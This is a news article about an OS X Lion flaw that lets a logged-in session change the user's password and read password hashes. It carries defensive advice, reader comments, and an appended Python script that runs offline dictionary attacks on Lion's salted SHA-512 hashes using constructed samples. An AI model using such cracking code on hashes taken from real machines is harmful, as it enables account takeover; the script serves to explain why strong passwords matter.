Any Lion System Can Be Compromised With Trivial, Easy To Perform Password Hack



A security research firm claims to have found a serious flaw in Apple's latest Mac OS X release, Lion, that lets an attacker with a session on the machine change the logged-in user's password without knowing the current one. The researcher attributes it to a change in Lion's authentication system that allows non-root users to read password hash data which should be readable only by root.

Chester Wisniewski explained in a post on Sophos's Naked Security blog that Apple's decision to use a local directory service in OS X Lion has left the relevant permissions insecure:

“An attacker who has access to a logged in Mac (locally, over VNC/RDC, SSH, etc) is able to change the currently logged in user’s password without knowing the existing password as would normally be required. Historically (in Snow Leopard) you would have needed to enter your existing password first to verify that you in fact are the account holder.”

“Not only can a logged in user change their password without knowledge of the existing password, but you can read any other user's password hash and make attempts at brute forcing it. This is particularly dangerous if you are using Apple’s new FileVault 2 disk encryption. If your Mac were left unlocked and someone changed your password you would no longer be able to boot your computer and potentially would lose access to all of your data.”

Wisniewski also said the flaw exposes the password hashes of the other accounts on the machine, not just the logged-in user's, so those accounts can be attacked offline as well.

Lion users will be hoping that Apple issues a fix for the flaw imminently, but according to Wisniewski it is still present in the current OS X 10.7.2 beta. It is worth remembering, however, that an attacker needs an existing session on your Mac to exploit it, either at the keyboard or through a remote service such as VNC or SSH that you have enabled. The flaw does not open a new way in; it turns an unattended or remotely reachable session into a full account takeover, so the defence is to keep that session out of reach.

Wisniewski recommends using a strong password so that a leaked hash resists brute-force attacks, requiring a password to wake the Mac from the screensaver or sleep, disabling automatic login, and using a ‘Hot Corner’ or the Keychain menu's lock item to lock the screen when you step away. Remote Login (SSH) and Screen Sharing (VNC) are off by default on OS X; leave them off unless you need them, and restrict them to specific accounts rather than all users if you do.
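As an added example that is not part of the article or of Wisniewski's post, the following Python script shows the offline attack the quote above describes, and why the strong-password advice matters: once the hash has been read out of Directory Services, each guess costs one SHA-512 and never touches the Mac. It assumes the SALTED-SHA512 layout that Lion 10.7 uses for ShadowHashData (a 4-byte salt followed by SHA-512 of salt plus password, wrapped in a binary plist) and that dscl prints binary attributes as space-separated hex; neither detail is stated on the page, and the sample hash, wordlist and hex dump are constructed inline rather than taken from a real machine.

```python
import hashlib
import plistlib
import secrets
from typing import Iterable, Optional, Tuple

# Assumed Lion 10.7 layout: 4-byte salt || SHA-512(salt || password), 68 bytes total.
SALT_LEN = 4
DIGEST_LEN = hashlib.sha512().digest_size  # 64


def lion_salted_sha512(password: str, salt: bytes) -> bytes:
    """Build the 68-byte SALTED-SHA512 blob as this example assumes Lion stores it."""
    if len(salt) != SALT_LEN:
        raise ValueError("expected a %d-byte salt" % SALT_LEN)
    return salt + hashlib.sha512(salt + password.encode("utf-8")).digest()


def make_shadow_hash_data(password: str, salt: Optional[bytes] = None) -> bytes:
    """Constructed stand-in for a user's ShadowHashData attribute: a binary plist
    wrapping the blob. Used here only to fabricate sample input."""
    if salt is None:
        salt = secrets.token_bytes(SALT_LEN)
    return plistlib.dumps({"SALTED-SHA512": lion_salted_sha512(password, salt)},
                          fmt=plistlib.FMT_BINARY)


def parse_dscl_hex(text: str) -> bytes:
    """Undo the space-separated hex that dscl prints for binary attributes
    (assumed output format; also tolerates line breaks)."""
    return bytes.fromhex("".join(text.split()))


def extract_salted_sha512(attr: bytes) -> Tuple[bytes, bytes]:
    """Split the plist's SALTED-SHA512 blob into (salt, digest)."""
    blob = plistlib.loads(attr)["SALTED-SHA512"]
    if len(blob) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(blob))
    return blob[:SALT_LEN], blob[SALT_LEN:]


def dictionary_attack(attr: bytes, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline guessing. The salt travels with the hash, so it stops precomputed
    tables but not a wordlist: each candidate costs exactly one SHA-512 and no
    interaction with the Mac. Returns (recovered password or None, guesses tried)."""
    salt, digest = extract_salted_sha512(attr)
    tried = 0
    for candidate in wordlist:
        tried += 1
        if hashlib.sha512(salt + candidate.encode("utf-8")).digest() == digest:
            return candidate, tried
    return None, tried


if __name__ == "__main__":
    # Constructed wordlist and accounts; no real hashes involved.
    wordlist = ["password", "123456", "letmein", "qwerty", "macbook"]
    weak = make_shadow_hash_data("letmein")
    strong = make_shadow_hash_data("correct-horse-battery-staple-7!")

    # Round-trip through the assumed dscl hex presentation before attacking.
    hexdump = " ".join(weak.hex()[i:i + 8] for i in range(0, len(weak.hex()), 8))
    assert parse_dscl_hex(hexdump) == weak

    print("weak:  ", dictionary_attack(parse_dscl_hex(hexdump), wordlist))  # ('letmein', 3)
    print("strong:", dictionary_attack(strong, wordlist))                   # (None, 5)
```

The point of the round trip is that nothing in the blob is secret once it can be read: the salt is stored alongside the digest, so the only thing standing between an exposed hash and the password is the size of the space a guesser has to search, which is exactly what a long, non-dictionary password buys you.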

[via Macworld]

  • GregsTechBlog

    Or, they could just restart the system while holding cmd+r, and reset the password. Unless I’m mistaken, this has been a flaw in Mac OS for some time, although previously, the install DVD was required. Now, however, the recovery partition allows anyone to do it without a DVD. 

  • Tchoupi

    From the original post:

    1) This only works for the LOGGED IN USER

    2) Running the command with a different user will prompt you for old password

    3) Running the directory query with a different user will not expose the hash

    So, basically, the article should say, “These issues are present for the
    logged in user only, not any other user”. Which is of course why you
    shouldn’t use your Macintosh with your admin user account.

    Also, none of this will expose the Keychain.

  • Rob

    I checked this with the latest 10.7.2 beta and I couldn’t change any password other than my own using the dscl command. I’m running FV2 with a firmware password as well. I could change my password, but it only changes the login password, not the keychain password. When trying to change other users’ passwords, it asks for and requires the current password. Not sure what I did to make mine work better than Wisniewski’s, but I have not seen the threat to be as bad as he is saying it is.

  • Munas

    Last year Apple, for some reason, was in a rush to release new hardware and software, leaving bugs or implementing predominantly good ideas that were not finalized and polished, making our beloved system more vulnerable and less reliable.

  • Ed_Kel

    If you leave your logged in Mac in some place where a “hacker” can access it then you deserve what’s coming to you.

  • blondepianist

    Unless you’ve set a firmware password.

  • prof_peabody

    Your headline is very misleading. All this means is that someone logged in remotely can change the password without being asked for the current one. This is not the way it’s supposed to work, of course, but the person already has to be logged in to perform it.

  • Martin Topinka

    By that place you probably mean internet?

  • Ed_Kel

    VNC? SSH tunnels? You’re joking, right?

    I highly doubt anyone will open an SSH tunnel, etc., to an unknown source and if you do, read above.

  • Rob

    You’re correct, but to log in remotely the destination Mac has to have some kind of sharing turned on (everything is off by default), and you still have to enter the destination user’s password to make that connection before you try and change it (yes, that sounds stupid, and that’s what I think of this “potential” threat). I do not use third-party Mac sharing services (e.g., LogMeIn), I disable my Guest account, and for any sharing service I do configure I require them to use a specific user account, not “everybody.”

    As far as leaving your Mac accessible, Apple doesn’t force you to enter a password to log on (automatic logon is not off by default) and it doesn’t force a screen saver to use a password to wake from the screen saver or sleep. It also doesn’t force the use of a firmware password to require a password when bypassing the normal startup process. These are all more important to me than this apparent problem with dscl, which I have not reproduced except for the currently logged on user.

  • Kenneth Berger

    You have to be logged in for this to work! It is not a threat for real people.

  • CharliK

    This is somewhat incorrect.

    You do NOT have to be logged in. Reboot to the recovery partition and you get the password utility in Terminal

    Also this is NOT new. If you had an install disk for the appropriate OS version, you could boot to that to do the same thing.

  • ctt1wbw

    You can do the same thing in a typical Linux desktop environment, if I’m not mistaken. 

  • Peter

    Excellent point!  After all, I never log in to my computer.  I just use it as a very expensive doorstop.

  • Peter Thorn

    Has the way to bypass the firmware password been fixed in Lion? Because until 10.6.x it has been very easy to circumvent, thus making it quite useless…

  • Bob

    This isn’t news. Put me on any system and I can gain access to that system and change the password. I don’t care how “secure” it is. Let me get onto any system through any remote means, and where there is a will there is a way :). If I have physical access to the system, even better, my job is even easier. Consider it owned!! If you really want to secure your computer, don’t connect it to the internet and don’t leave it out anywhere; keep that thing under lock and key.

  • Juan Carlos

    Still the same..

  • Juan Carlos